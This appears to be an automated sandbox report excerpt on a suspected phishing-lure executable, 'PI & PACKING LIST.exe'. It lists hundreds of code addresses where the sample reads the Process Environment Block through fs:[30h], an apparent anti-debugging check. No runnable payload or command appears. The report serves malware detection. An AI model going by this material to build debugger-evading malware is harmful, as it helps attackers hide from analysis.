Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01262990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012C41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01304015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01304015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01301074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01250050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01250050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012790AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01239080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012358EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012CB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01263B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01263B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01308B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01305BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01241B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01241B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126138B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126138B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126138B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012ED380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01262397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012E23E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012E23E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012E23E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01274A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01274A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01248A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01235210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01235210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01235210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01235210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01253A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012EB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012EB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01308A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0127927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012FEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012C4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0124AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0124AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01262AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01262ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01308D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0123AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012FE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012BA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0125C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01273D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012E3D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01257D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012635A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_013005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_013005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h]
